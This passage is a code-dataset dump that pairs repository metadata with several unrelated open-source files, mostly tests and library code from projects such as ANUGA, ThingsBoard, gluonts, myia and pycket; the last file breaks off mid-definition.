max_stars_repo_path
stringlengths
4
245
max_stars_repo_name
stringlengths
7
115
max_stars_count
int64
101
368k
id
stringlengths
2
8
content
stringlengths
6
1.03M
tests/components/generic_thermostat/__init__.py
MrDelik/core
30,023
11096029
"""generic_thermostat tests."""
vint/linting/lint_target.py
mosheavni/vint
538
11096033
<gh_stars>100-1000 from typing import Optional # noqa: F401 from pathlib import Path from io import BufferedIOBase class AbstractLintTarget(object): def __init__(self, path): # type: (Path) -> None self.path = path def read(self): # type: () -> bytes raise NotImplementedError() class LintTargetFile(AbstractLintTarget): def __init__(self, path): # type: (Path) -> None super(LintTargetFile, self).__init__(path) def read(self): # type: () -> bytes with self.path.open('rb') as f: return f.read() class LintTargetBufferedStream(AbstractLintTarget): def __init__(self, alternate_path, buffered_io): # type: (Path, BufferedIOBase) -> None super(LintTargetBufferedStream, self).__init__(alternate_path) self._buffered_io = buffered_io def read(self): # type: () -> bytes return self._buffered_io.read() class CachedLintTarget(AbstractLintTarget): def __init__(self, lint_target): # type: (AbstractLintTarget) -> None super(CachedLintTarget, self).__init__(lint_target.path) self._target = lint_target self._cached_bytes = None # type: Optional[bytes] def read(self): # type: () -> bytes if self._cached_bytes is not None: return self._cached_bytes result = self._target.read() self._cached_bytes = result return result
examples/cairns_excel/flow_through_cross_sections.py
samcom12/anuga_core
136
11096044
<filename>examples/cairns_excel/flow_through_cross_sections.py """ Post-processing code to compute flux through cross-sections. Implementation currently uses an approximate method The user must hard-code the polylines directionay (defining the cross-sections) below. See the help for 'get_approximate_discharge_timeseries' for info on how the discharge is computed through the polylines (including how the sign is determined). The user can either hard-code the sww_filename, knn, and desired_ds (below), or pass them as command line arguments to the code This calling approach will use the hard coded values > python flow_through_cross_sections.py This calling approach will use the command line arguments [in order the sww filename, knn, and desired_ds] > python flow_through_cross_sections.py MODEL_OUTPUTS/RUN_XXXX/mysww.sww 1 500.0 <NAME>, Geoscience Australia 2014+ """ import sys, os import pickle import anuga from anuga import plot_utils as util import scipy.spatial import numpy from anuga.utilities import spatialInputUtil as su import matplotlib # NCI hack, since interactive plotting fails there try: from matplotlib import pyplot as pyplot except: matplotlib.use('Agg') from matplotlib import pyplot as pyplot ## USER INPUT #### # polylines can have multiple segment polylines = { 'Offshore': [ [666779.0, 8253357.], [673906., 8096367.], [684597., 7983715.]], 'CoastalInlet': [ [393277., 8104579.], [395059., 8095373.]] } # Hard-coded values, possibly overwritten by command line arguments sww_filename = 'MODEL_OUTPUTS/RUN_20150625_110925_cairns_excel/cairns_excel.sww' knn = 1 # How many neighbours to use for interpolation desired_ds = 500.0 # Spacing of points along integration lines ## END USER INPUT ### def get_approximate_discharge_timeseries(sww_filename, polylines, desired_ds=0.5, k_nearest_neighbours=1, search_mesh=True, verbose=True): """Given an sww_filename and a dictionary of 1D polylines, estimate the discharge timeseries through each polyline by interpolating the centroid uh/vh onto evenly spaced points on the polyline (with spacing ~ desired_ds), computing the flux normal to the line, and using the trapezoidal rule to integrate it. The interpolation of centroid uh/vh onto the polyline points can be either based on 'k-nearest-neighbours', or a direct-search of the mesh triangles. The former can be fast and allow for smoothing, while the latter is often still fast enough, and might be more accurate. The positive/negative discharge direction is determined from the polyline. Consider a river channel. If the polyline begins on the left-bank and ends on the right bank (left/right defined when facing downstream) then discharge in the downstream direction is positive. WARNING: The result is approximate only because ANUGA's internal edge fluxes are derived differently (with the reimann solver), and because the interpolation does not follow ANUGA's, and because your transect might not be exactly perpendicular to the flow. None of the methods give an exact result at present. Errors can be significant where the solution is changing rapidly. It may be worth comparing multiple cross-sections in the vicinity of the site of interest [covering different mesh triangles, with slightly different orientations]. @param sww_filename name of sww file @param polylines dictionary of polylines, e.g. polylines = { 'Xsection1': [ [495., 1613.], [495., 1614.], [496., 1615.] ], 'Xsection2': [ [496., 1614.], [4968., 1615.] ] } @param desired_ds point spacing used for trapozoidal integration on polylines @param k_nearest_neighbours number of nearest neighbours used for interpolation of uh/vh onto polylines @param search_mesh If True AND k_nearest_neighbours=1, we search the mesh vertices to find the triangle containing our point. Otherwise do nearest-neighbours on the triangle centroids to estimate the 'nearest' triangle @param verbose @return a list of length 2 with the output_times as a numpy array, and a dictionary with the flow timeseries """ if (search_mesh) & (k_nearest_neighbours > 1): msg = 'k_nearest_neighbours must be 1 when search_mesh is true' raise Exception(msg) # 2 ways to associate transect points with triangle values # 1) knn on centroids, or # 2) directly search for mesh triangles containing transect points # 1 can be faster + allows for smoothing, but 2 might be usually better use_knn = (search_mesh == False) | (k_nearest_neighbours != 1) if use_knn: # Centroids are used for knn p = util.get_centroids(sww_filename, timeSlices=0) sww_xy = numpy.vstack([p.x+p.xllcorner, p.y+p.yllcorner]).transpose() point_index_kdtree = scipy.spatial.cKDTree(sww_xy) else: # Vertices are used for mesh search p = util.get_output(sww_filename, timeSlices=0) # To conserve memory read from netcdf directly from anuga.file.netcdf import NetCDFFile sww_nc = NetCDFFile(sww_filename) ud = sww_nc.variables['xmomentum_c'] vd = sww_nc.variables['ymomentum_c'] output_times = sww_nc.variables['time'][:] discharge_series = {} for pk in polylines.keys(): if verbose: print pk pl_full = polylines[pk] for segment_num in range(len(pl_full)-1): pl = [ pl_full[segment_num], pl_full[segment_num + 1] ] segment_length = ( (pl[0][0] - pl[1][0])**2 +\ (pl[0][1] - pl[1][1])**2 )**0.5 # Normal vector n1 = (pl[0][1] - pl[1][1])/segment_length n2 = -(pl[0][0] - pl[1][0])/segment_length # Approximate segment as npts points npts = int(numpy.ceil( segment_length / (desired_ds) + 1.0)) gridXY = numpy.vstack([scipy.linspace(pl[0][0], pl[1][0], num=npts), scipy.linspace(pl[0][1], pl[1][1], num=npts)] ).transpose() # Actual distance between points ds = (numpy.diff(gridXY[:,0])**2 + numpy.diff(gridXY[:,1])**2)**0.5 ds_trapz = numpy.hstack([ ds[0], (ds[0:-1] + ds[1:]), ds[-1]])*0.5 if verbose: print 'Finding triangles containing point' if use_knn: point_distance, point_indices = point_index_kdtree.query(gridXY, k = k_nearest_neighbours) else: gridXY_offset = gridXY*0. gridXY_offset[:,0] = gridXY[:,0] - p.xllcorner gridXY_offset[:,1] = gridXY[:,1] - p.yllcorner point_indices = numpy.zeros( gridXY.shape[0]).astype(int) # Provide the order to search the points (might be faster?) v1 = p.vols[:,0] search_order_update_freq = 1 for i in range(gridXY.shape[0]): # For efficiency, we don't recompute the order to search points # everytime if i%search_order_update_freq==0: # Update the mesh triangle search order first_vertex_d2 = (p.x[v1] - gridXY_offset[i,0])**2 +\ (p.y[v1] - gridXY_offset[i,1])**2 search_order = first_vertex_d2.argsort().tolist() # Estimate how often we should update the triangle ordering # Use "distance of point to vertex" / "point spacing" # Crude search_order_update_freq = \ int(numpy.ceil((first_vertex_d2[search_order[0]]**0.5)/ds[0])) point_indices[i] =\ util.get_triangle_containing_point(p, gridXY_offset[i,:], search_order = search_order) if verbose: print 'Computing the flux' if k_nearest_neighbours == 1: point_uh = ud[:][:, point_indices] point_vh = vd[:][:, point_indices] else: point_uh = numpy.zeros( (len(output_times), len(point_indices[:,0]))) point_vh = numpy.zeros( (len(output_times), len(point_indices[:,0]))) # Compute the inverse distance weighted uh/vh numerator = point_uh*0. denominator = point_uh*0. inv_dist = 1.0/(point_distance+1.0e-12) #Avoid zero division # uh for k in range(k_nearest_neighbours): ud_data = ud[:][:,point_indices[:,k]] for ti in range(len(output_times)): numerator[ti,:] += ud_data[ti,:]*inv_dist[:,k] denominator[ti,:] += inv_dist[:,k] point_uh = numerator/denominator #vh numerator *= 0. denominator *= 0. for k in range(k_nearest_neighbours): vd_data = vd[:][:,point_indices[:,k]] for ti in range(len(output_times)): numerator[ti,:] += vd_data[ti,:]*inv_dist[:,k] denominator[ti,:] += inv_dist[:,k] point_vh = numerator/denominator Q = [ ((point_uh[i,:]*n1 + point_vh[i,:]*n2)*ds_trapz).sum() \ for i in range(len(output_times)) ] if segment_num == 0: discharge_series[pk] = numpy.array(Q) else: discharge_series[pk] += numpy.array(Q) return [output_times, discharge_series] def plot_discharge_timeseries(discharge_series_in, output_times, subset=None): """Quick-and-dirty plot of the discharge timeseries """ if subset is not None: discharge_series = discharge_series_subset(discharge_series_in, subset) else: discharge_series = discharge_series_in ## Plot all series site_order = discharge_series.keys() line_types = ['-', '-.', '--'] site_order.sort() for i, pk in enumerate(site_order): pyplot.plot(output_times, discharge_series[pk], line_types[i%3], label=pk) pyplot.legend(loc=3, fontsize='xx-small') pyplot.plot(output_times, output_times*0.,'--',color='black') return def discharge_series_subset(discharge_series, river_name_pattern): """Make a new discharge_series dictionary from all sites which match a pattern """ discharge_series_keys = discharge_series.keys() river_keys = [ discharge_series_keys[i] \ for i in su.matchInds(river_name_pattern, discharge_series_keys) ] new_discharge_series = {} for rk in river_keys: new_discharge_series[rk] = discharge_series[rk] return new_discharge_series ############################################################################### if __name__ == '__main__': # Parse command line arguments if len(sys.argv)>1: sww_filename = sys.argv[1] if len(sys.argv)>2: knn = int(sys.argv[2]) if len(sys.argv) > 3: desired_ds = float(sys.argv[3]) if knn==1: search_mesh = True else: search_mesh = False assert os.path.exists(sww_filename), 'sww_filename not found' print 'sww_filename: ' + sww_filename print 'knn: ' + str(knn) print 'desired_ds: ' + str(desired_ds) print '' output_times, discharge_series = get_approximate_discharge_timeseries( sww_filename, polylines, desired_ds=desired_ds, k_nearest_neighbours=knn, search_mesh=search_mesh) # Pickle outputs output_pickle = os.path.join(os.path.dirname(sww_filename), 'discharge_series.pkl') pickle.dump([output_times, discharge_series], open(output_pickle, 'w')) # Now write in text format for key in discharge_series.keys(): temp_array = numpy.vstack([output_times, discharge_series[key]]).transpose() numpy.savetxt( (os.path.join(os.path.dirname(sww_filename), key + '.csv')), temp_array, delimiter=',') # Lots of plots #try: # pyplot.ion() # pyplot.figure() # plot_discharge_timeseries(discharge_series, output_times) # rivers = ['Offshore', 'CoastalInlet'] # for river in rivers: # pyplot.figure() # plot_discharge_timeseries(discharge_series, output_times, river) # pyplot.title(river) #except: # print 'Interactive plotting failed (expected on NCI)'
test/pre_train/model_stats_perf.py
chao1412732094/tensorwatch
3,453
11096053
import copy import tensorwatch as tw import torchvision.models import torch import time model = getattr(torchvision.models, 'densenet201')() def model_timing(model): st = time.time() for _ in range(20): batch = torch.rand([64, 3, 224, 224]) y = model(batch) return time.time()-st print(model_timing(model)) model_stats = tw.ModelStats(model, [1, 3, 224, 224], clone_model=False) print(f'flops={model_stats.Flops}, parameters={model_stats.parameters}, memory={model_stats.inference_memory}') print(model_timing(model))
tests/converters/test_odbc_uplink_converter.py
linxingchao/tb_gateway_with_extension
1,123
11096065
<filename>tests/converters/test_odbc_uplink_converter.py # Copyright 2020. ThingsBoard # # Licensed under the Apache License, Version 2.0 (the "License"]; # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest from random import randint, uniform, choice from string import ascii_lowercase from thingsboard_gateway.connectors.odbc.odbc_uplink_converter import OdbcUplinkConverter class OdbcUplinkConverterTests(unittest.TestCase): def setUp(self): self.converter = OdbcUplinkConverter() self.db_data = {"boolValue": True, "intValue": randint(0, 256), "floatValue": uniform(-3.1415926535, 3.1415926535), "stringValue": "".join(choice(ascii_lowercase) for _ in range(8))} def test_glob_matching(self): converted_data = self.converter.convert("*", self.db_data) self.assertDictEqual(converted_data, self.db_data) def test_data_subset(self): config = ["floatValue", "boolValue"] converted_data = self.converter.convert(config, self.db_data) expected_data = {} for key in config: expected_data[key] = self.db_data[key] self.assertDictEqual(converted_data, expected_data) def test_alias(self): config = [{"column": "stringValue", "name": "valueOfString"}] converted_data = self.converter.convert(config, self.db_data) self.assertDictEqual(converted_data, {config[0]["name"]: self.db_data[config[0]["column"]]}) def test_name_expression(self): attr_name = "someAttribute" config = [{"nameExpression": "key", "value": "intValue"}] self.db_data["key"] = attr_name converted_data = self.converter.convert(config, self.db_data) self.assertDictEqual(converted_data, {attr_name: self.db_data[config[0]["value"]]}) def test_value_config(self): config = [{"name": "someValue", "value": "stringValue + str(intValue)"}] converted_data = self.converter.convert(config, self.db_data) self.assertDictEqual(converted_data, {config[0]["name"]: self.db_data["stringValue"] + str(self.db_data["intValue"])}) def test_one_valid_one_invalid_configs(self): config = ["unkownColumnValue", "stringValue"] converted_data = self.converter.convert(config, self.db_data) self.assertDictEqual(converted_data, {config[1]: self.db_data[config[1]]}) if __name__ == '__main__': unittest.main()
src/gluonts/mx/distribution/bijection_output.py
Xiaoxiong-Liu/gluon-ts
2,648
11096087
<reponame>Xiaoxiong-Liu/gluon-ts<filename>src/gluonts/mx/distribution/bijection_output.py # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # http://www.apache.org/licenses/LICENSE-2.0 # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. from typing import Tuple from gluonts.core.component import validated from gluonts.mx import Tensor from .bijection import Bijection from .distribution_output import Output class BijectionOutput(Output): """ Class to connect a network to a bijection """ bij_cls: type @validated() def __init__(self) -> None: pass def domain_map(self, F, *args: Tensor): raise NotImplementedError() def bijection(self, bij_args: Tensor) -> Bijection: return self.bij_cls(*bij_args) @property def event_shape(self) -> Tuple: raise NotImplementedError()
myia/operations/prim_split.py
strint/myia
222
11096096
<reponame>strint/myia<gh_stars>100-1000 """Definitions for the primitive `split`.""" import numpy as np from ..lib import ( SHAPE, TYPE, AbstractTuple, bprop_to_grad_transform, standard_prim, ) from ..operations import concat, zeros_like from . import primitives as P def pyimpl_split(x, sections, dim): """Implement `split`.""" sections = tuple(np.cumsum(sections))[:-1] return np.split(x, sections, axis=dim) @standard_prim(P.split) async def infer_split(self, engine, x, sections, dim): """Infer the return type of primitive `split`.""" sections_v = [e.xvalue() for e in sections.elements] x_shp_v = x.xshape() dim_v = dim.xvalue() shp_r = () for s in sections_v: shp_r = shp_r + (x_shp_v[:dim_v] + (s,) + x_shp_v[dim_v + 1 :],) return AbstractTuple( [ type(x)(x.element, {SHAPE: out_shape, TYPE: x.xtype()}) for out_shape in shp_r ] ) @bprop_to_grad_transform(P.split) def bprop_split(x, sections, dim, out, dout): """Backpropagator for primitive `split`.""" x_grad = concat(dout, dim) return (x_grad, zeros_like(sections), zeros_like(dim)) __operation_defaults__ = { "name": "split", "registered_name": "split", "mapping": P.split, "python_implementation": pyimpl_split, } __primitive_defaults__ = { "name": "split", "registered_name": "split", "type": "backend", "python_implementation": pyimpl_split, "inferrer_constructor": infer_split, "grad_transform": bprop_split, }
pycket/test/test_prims.py
namin/pycket
129
11096099
<gh_stars>100-1000 #! /usr/bin/env python # -*- coding: utf-8 -*- # # A place for testing primitives # import pytest import os import sys from pycket import values from pycket.values import w_true from pycket.test.testhelper import check_all, check_none, check_equal, run_flo, run_fix, run, run_mod, run_mod_expr skip = pytest.mark.skipif("True") def test_equal(): check_all( "(equal? 1 1)", "(equal? 1.5 (+ 0.5 1))", "(equal? 1+1i 1+1i)", "(equal? 'foo 'foo)", "(equal? '() '())", "(equal? #f #f)", "(equal? #t #t)", "(equal? (cons 1 2) (cons 1 2))", "(equal? (vector->list (make-vector 10000 5)) (vector->list (make-vector 10000 5)))", "(equal? #() #())", "(equal? #(1) #(1))", "(equal? #(1 2) #(1 2))", '(equal? "abc" "abc")', ) check_none( "(equal? 1 2)", "(equal? 1 2.2)", "(equal? 1 1.0)", "(equal? 1+1i 1.0+0i)", "(equal? 1+1i 1)", "(equal? 'foo 'bar)", "(equal? '() #f)", "(equal? #f #t)", "(equal? (cons 1 2) (cons 1 4))", "(equal? (cons 2 2) (cons 1 2))", "(equal? (cons 2 (cons 1 2)) (cons 1 (cons 1 (cons 1 6))))", "(equal? #(1) #())", "(equal? #(1 2 3 4 5) #(1 2 3 4 6))", "(equal? #(1 2 3 4 5) #(1 2 3 4 'a))", '(equal? "abc" "def")', ) def test_equal2(doctest): """ ! (require racket/base) > (equal? (string->path "/usr/bin/bash") (string->path "/usr/bin/bash")) #t > (equal? (string->path "/usr/bin/bash") (string->path "/usr/bin/tcsh")) #f """ ############################################################################### def test_append_single(doctest): """ > (append #f) #f > (append (list 1 2) (list 3 4)) '(1 2 3 4) """ assert doctest def test_append_vararg(doctest): """ > (append (list 1 2) (list 3 4) (list 5 6) (list 7 8)) '(1 2 3 4 5 6 7 8) """ assert doctest def test_for_each_single(doctest): """ ! (require (only-in '#%kernel for-each)) > (let ([x 0]) (for-each (lambda (y) (set! x (+ x y))) '(1 2 3)) x) 6 """ assert doctest def test_for_each_vararg(doctest): """ ! (require (only-in '#%kernel for-each)) > (let ([x 1]) (for-each (lambda (a b c) (set! x (+ x (* a b c)))) '(1 2 3) '(4 5 6) '(7 8 9)) x) 271 """ assert doctest def test_map(doctest): """ ! (require (only-in '#%kernel map)) > (map (lambda (number) (+ 1 number)) '(1 2 3 4)) '(2 3 4 5) > (map (lambda (number1 number2) (+ number1 number2)) '(1 2 3 4) '(10 100 1000 10000)) '(11 102 1003 10004) E (map) E (map (lambda (x) 1)) E (map (lambda (x) 1) (list 1 2) (list 2 3)) """ assert doctest def test_shorthands(doctest): """ > (caar '((1 2) 3 4)) 1 > (cadr '((1 2) 3 4)) 3 > (cdar '((7 6 5 4 3 2 1) 8 9)) '(6 5 4 3 2 1) > (cddr '(2 1)) '() > (caaar '(((6 5 4 3 2 1) 7) 8 9)) 6 > (caadr '(9 (7 6 5 4 3 2 1) 8)) 7 > (cadar '((7 6 5 4 3 2 1) 8 9)) 6 > (caddr '(3 2 1)) 1 > (cdaar '(((6 5 4 3 2 1) 7) 8 9)) '(5 4 3 2 1) > (cdadr '(9 (7 6 5 4 3 2 1) 8)) '(6 5 4 3 2 1) > (cddar '((7 6 5 4 3 2 1) 8 9)) '(5 4 3 2 1) > (cdddr '(3 2 1)) '() > (caaaar '((((5 4 3 2 1) 6) 7) 8 9)) 5 > (caaadr '(9 ((6 5 4 3 2 1) 7) 8)) 6 > (caadar '((7 (5 4 3 2 1) 6) 8 9)) 5 > (caaddr '(9 8 (6 5 4 3 2 1) 7)) 6 > (cadaar '(((6 5 4 3 2 1) 7) 8 9)) 5 > (cadadr '(9 (7 6 5 4 3 2 1) 8)) 6 > (caddar '((7 6 5 4 3 2 1) 8 9)) 5 > (cadddr '(4 3 2 1)) 1 > (cdaaar '((((5 4 3 2 1) 6) 7) 8 9)) '(4 3 2 1) > (cdaadr '(9 ((6 5 4 3 2 1) 7) 8)) '(5 4 3 2 1) > (cdadar '((7 (5 4 3 2 1) 6) 8 9)) '(4 3 2 1) > (cdaddr '(9 8 (6 5 4 3 2 1) 7)) '(5 4 3 2 1) > (cddaar '(((6 5 4 3 2 1) 7) 8 9)) '(4 3 2 1) > (cddadr '(9 (7 6 5 4 3 2 1) 8)) '(5 4 3 2 1) > (cdddar '((7 6 5 4 3 2 1) 8 9)) '(4 3 2 1) > (cddddr '(4 3 2 1)) '() """ def test_random(): for i in range(100): x = run_flo("(random)") assert 0.0 <= x < 1.0 x = run_fix("(random %s)" % (5 + i)) if pytest.config.new_pycket: assert 0 <= x.value < i + 5 else: assert 0 <= x < i + 5 def test_random_seed(): run("(begin (random-seed 142) (let-values (((x) (random))) (random-seed 142) (= (random) x)))", w_true) def test_byte_huh(doctest): """ > (byte? 65) #t > (byte? 0) #t > (byte? 256) #f > (byte? -1) #f """ def test_make_bytes_create(doctest): """ > (make-bytes 5 65) #"AAAAA" E (make-bytes 5 11111) > (bytes 65 112 112 108 101) #"Apple" > (bytes) #"" """ def test_make_string_create(doctest): """ > (make-string 5 #\A) "AAAAA" > (string #\A #\p #\p #\l #\e) "Apple" > (string) "" """ def test_list_to_bytes(doctest): """ > (list->bytes (list 65 112 112 108 101)) #"Apple" """ def test_bytes(doctest): """ > (bytes-length #"Apple") 5 > (bytes-ref #"Apple" 0) 65 > (define s (bytes 65 112 112 108 101)) > (bytes-set! s 4 121) > s #"Apply" """ def test_unsafe_bytes(doctest): """ ! (require '#%unsafe) > (unsafe-bytes-length #"Apple") 5 > (unsafe-bytes-ref #"Apple" 0) 65 > (define s (bytes 65 112 112 108 101)) > (unsafe-bytes-set! s 4 121) > s #"Apply" """ def test_subbytes(doctest): """ > (subbytes #"Apple" 1 3) #"pp" > (subbytes #"Apple" 1) #"pple" """ def test_bytes_copy_bang(doctest): """ > (define s (bytes 65 112 112 108 101)) > (bytes-copy! s 4 #"y") > (bytes-copy! s 0 s 3 4) > s #"lpply" """ def test_open_input_bytes_and_read_bytes_line(source): """ (let* ([b (string->bytes/utf-8 "ABC\nDEF\n\nGHI\n\nJKL\n\n\nMNOP\n")] [expected '(#"MNOP" #"" #"" #"JKL" #"" #"GHI" #"" #"DEF" #"ABC")] [inport (open-input-bytes b)]) (let ([res (let rev ([lines null]) (let ([line (read-bytes-line inport)]) (if (eof-object? line) lines (rev (cons line lines)))))]) (equal? res expected))) """ result = run_mod_expr(source, wrap=True) assert result == w_true def test_read_bytes(source): """ (let ([ip (open-input-bytes (bytes 115 101 99 114 101 116))]) (read-bytes 6 ip)) """ result = run_mod_expr(source, wrap=True) assert isinstance(result, values.W_Bytes) assert result.value == list("secret") def test_read_utf8_bytes_chars(source): ur""" (let* ([b "ÄÖÜ"] [inport (open-input-string b)] [res1 (read-byte inport)] [res2 (read-byte inport)] [res3 (read-char inport)] ) (and (equal? res1 195) (equal? res2 132) (equal? res3 #\Ö))) """ result = run_mod_expr(source, wrap=True) assert result == w_true def test_open_input_and_read_line(source): u""" (let* ([b "ÄBC\nDEF\n\nGHI\n\nJKL\n\n\nMNOP\n"] [expected '("MNOP" "" "" "JKL" "" "GHI" "" "DEF" "ÄBC")] [inport (open-input-string b)]) (let ([res (let rev ([lines null]) (let ([line (read-line inport)]) (if (eof-object? line) lines (rev (cons line lines)))))]) (equal? res expected))) """ result = run_mod_expr(source, wrap=True) assert result == w_true def test_bytes_port(doctest): r""" ;> (define op1 (open-output-bytes)) ;> (write '((1 2 3) ("Tom" "Dick") ('a 'b 'c)) op1) ;> (get-output-bytes op1) ; #"((1 2 3) (\"Tom\" \"Dick\") ((quote a) (quote b) (quote c)))" ;> (define op2 (open-output-bytes)) ;> (write "Hi " op2) ;> (write "there" op2) ;> (get-output-bytes op2) ; #"\"Hi \"\"there\"" ! (define op3 (open-output-bytes)) > (write-bytes #"Hi " op3) 3 > (display #"there" op3) > (get-output-bytes op3) #"Hi there" """ #################### def test_procedure_arity(doctest): """ ! (require racket/private/norm-arity) > (procedure-arity cons) 2 > (procedure-arity list) (arity-at-least 0) > (arity-at-least? (procedure-arity list)) #t > (arity-at-least-value (procedure-arity list)) 0 > (arity-at-least-value (procedure-arity (lambda (x . y) x))) 1 > (procedure-arity (case-lambda [(x) 0] [(x y) 1])) '(1 2) """ def test_procedure_arity_includes(doctest): """ ! (require racket/private/kw) > (procedure-arity-includes? cons 2) #t > (procedure-arity-includes? display 3) #f > (procedure-arity-includes? (lambda (x #:y y) x) 1) #f > (procedure-arity-includes? (lambda (x #:y y) x) 1 #t) #t """ ############################################################################# def test_system_type_os(source): """(cons (system-type) (system-type 'os))""" result = run_mod_expr(source, wrap=True) assert result.car() == result.cdr() sym = result.car().asciivalue() # Sadly, this can never cover all cases. if sys.platform == "darwin": assert sym == "macosx" elif sys.platform in ['win32', 'cygwin']: assert sym == "windows" else: assert sym == "unix" def test_system_path_convention_type(source): """(system-path-convention-type)""" result = run_mod_expr(source, wrap=True) sym = result.asciivalue() if sys.platform in ['win32', 'cygwin']: assert sym == "windows" else: assert sym == "unix" @pytest.mark.skip(reason="will be solved when tostring is not 'write'") def test_number_to_string(doctest): """ > (number->string 10) "10" > (number->string -10) "-10" > (number->string -1.1) "-1.1" > (number->string -5.5) "-5.5" > (number->string -17+1i) "-17+1i" > (number->string -5/6) "-5/6" > (number->string 1 16) "1" > (number->string 10 16) "a" > (number->string 111 16) "6f" E (number->string 111 -164) > (number->string -164 16) "-a4" E (number->string -164.3 16) ;> (number->string -4/5 16) ;"-4/5" ;> (number->string -4/12311 16) ;"-4/3017" > (number->string 111111111111111111111111111111111111111111111111111111111111111111111111111111111 16) "3bf9304450677dc5f60e4afde2a26b6546f195ed670022bc71c71c71c71c71c71c7" """ def test_list_to_string(doctest): r""" > (list->string (list #\A #\p #\p #\l #\e)) "Apple" """ def test_char_cmp_huh(doctest): r""" > (char=? #\a #\a) #t > (char=? #\a #\A #\a) #f > (char<? #\A #\a) #t > (char<? #\a #\A) #f > (char<? #\a #\b #\c) #t > (char<=? #\A #\a) #t > (char<=? #\a #\A) #f > (char<=? #\a #\b #\b) #t > (char>? #\A #\a) #f > (char>? #\a #\A) #t > (char>? #\c #\b #\a) #t > (char>=? #\A #\a) #f > (char>=? #\a #\A) #t > (char>=? #\c #\b #\b) #t > (char-ci=? #\A #\a) #t > (char-ci=? #\a #\a #\a) #t > (char-ci<? #\A #\a) #f > (char-ci<? #\a #\b) #t > (char-ci<? #\a #\b #\c) #t > (char-ci<=? #\A #\a) #t > (char-ci<=? #\a #\A) #t > (char-ci<=? #\a #\b #\b) #t > (char-ci>? #\A #\a) #f > (char-ci>? #\b #\A) #t > (char-ci>? #\c #\b #\a) #t > (char-ci>=? #\A #\a) #t > (char-ci>=? #\a #\A) #t > (char-ci>=? #\c #\b #\b) #t """ def test_char_prop_huh(doctest): r""" > (char-alphabetic? #\a) #t > (char-alphabetic? #\=) #f > (char-numeric? #\0) #t > (char-numeric? #\=) #f > (char-whitespace? #\tab) #t > (char-whitespace? #\=) #f """ def test_gcd_lcm(doctest): """ > (gcd 10) 10 > (gcd 12 81.0) 3.0 > (gcd 1/2 1/3) 1/6 > (lcm 10) 10 > (lcm 3 4.0) 12.0 > (lcm 1/2 2/3) 2 """ def test_read(doctest): """ ! (define (rs s) (read (open-input-string s))) > (rs "1") 1 > (rs "#t") #t > (rs "abc") 'abc > (define s (open-input-string "1 #t abc")) > (read s) 1 > (read s) #t > (read s) 'abc > (rs "()") '() > (rs "(1)") '(1) > (rs "(1 2 3 a b c)") '(1 2 3 a b c) > (rs "(1 (2 3) (a (b c)))") '(1 (2 3) (a (b c))) > (rs "[]") '[] > (rs "[]") '() > (rs "[1]") '[1] > (rs "[1 2 3 a b c]") '[1 2 3 a b c] > (rs "[1 [2 3] [a [b c]]]") '[1 [2 3] [a [b c]]] > (rs "(1 . 2)") (cons 1 2) > (rs "(a . b)") (cons 'a 'b) > (rs "(a.b . c.d)") (cons 'a.b 'c.d) > (rs "...") '... > (rs "'(1)") ''(1) > (rs "`(1)") '`(1) > (rs "`(,1)") '`(,1) > (rs "\\"1\\"") "1" > (rs "\\"'abc\\"") "'abc" > (rs "\\"hello jed\\"") "hello jed" > (rs "\\"abc.123\\"") "abc.123" > (rs "\\"\\t\\n\\"") "\\t\\n" > (rs "ab;cd") 'ab > (rs "12;cd\\n") 12 > (define s2 (open-input-string "12;\\n34")) > (read s2) 12 > (read s2) 34 > (rs "#'()") '(syntax ()) > (rs "#`()") '(quasisyntax ()) > (rs "#`(#,x)") '(quasisyntax ((unsyntax x))) > (rs "#`(#,@x)") '(quasisyntax ((unsyntax-splicing x))) """ def test_close_port(doctest): """ > (define sp (open-input-string "(apples 42 day)")) > (port-closed? sp) #f > (close-input-port sp) > (port-closed? sp) #t > (define op (open-output-string)) > (port-closed? op) #f > (close-output-port op) > (port-closed? op) #t """ def test_port_read_peek(doctest): r""" > (define sp (open-input-string "(apples 42 day)")) > (peek-char sp) #\( > (peek-char sp 5) #\e > (read-char sp) #\( > (define bp (open-input-bytes #"(apples 42 day)")) > (peek-byte bp) 40 > (peek-byte bp 5) 101 > (read-byte bp) 40 > (define usp (open-input-string "\u4F60\u597D,\u4E16\u754C")) > (peek-byte usp) 228 > (peek-char usp) #\u4F60 > (peek-char usp) #\u4F60 > (read-char usp) #\u4F60 > (read-char usp) #\u597D > (read-char usp) #\, """ def test_peek_bug(tmpdir): from pycket.prims.input_output import open_infile from pycket import values_string s = "abc\ndef\nghi" f = tmpdir.join("example.txt") f.write(s) w_n = values_string.W_String.fromstr_utf8(str(f)) w_p = open_infile(w_n, "r") for c in s: c1 = w_p.peek() assert c1 == c c2 = w_p.read(1) assert c == c c = w_p.peek() assert c == '' c = w_p.read(1) assert c == '' w_p.close() def test_listp(doctest): """ > (list? '(1 2)) #t > (list? (cons 1 (cons 2 '()))) #t > (list? (cons 1 2)) #f > (list? 1) #f """ def test_format(doctest): r""" > (format "a") "a" E (format "a~a") E (format "a" 1) > (format "~~~n~%") "~\n\n" > (format "abc~adef~aghi" 1 2) "abc1def2ghi" """ def test_procedure_closure_contents_eq(doctest): r""" ! (define (f x) (lambda () x)) ! (define a "abc") ! (define (g x) (lambda () (g x))) ! (set! f (lambda (x) (lambda () x))) ! (set! g (lambda (x) (lambda () (g x)))) > (procedure-closure-contents-eq? (f a) (f a)) #t > (procedure-closure-contents-eq? (f a) (f "abc")) #t > (procedure-closure-contents-eq? (f 1) (f 1)) #t > (procedure-closure-contents-eq? (f a) (f "c")) #f > (procedure-closure-contents-eq? (g a) (g a)) #t > (procedure-closure-contents-eq? (g a) ((g a))) #t > (procedure-closure-contents-eq? (g a) (((g a)))) #t > (procedure-closure-contents-eq? (g a) (((g "c")))) #f """ def test_list_ref(doctest): """ > (list-ref '(1 2 3) 0) 1 > (list-ref '(1 2 3) 1) 2 > (list-ref '(1 2 3) 2) 3 """ def 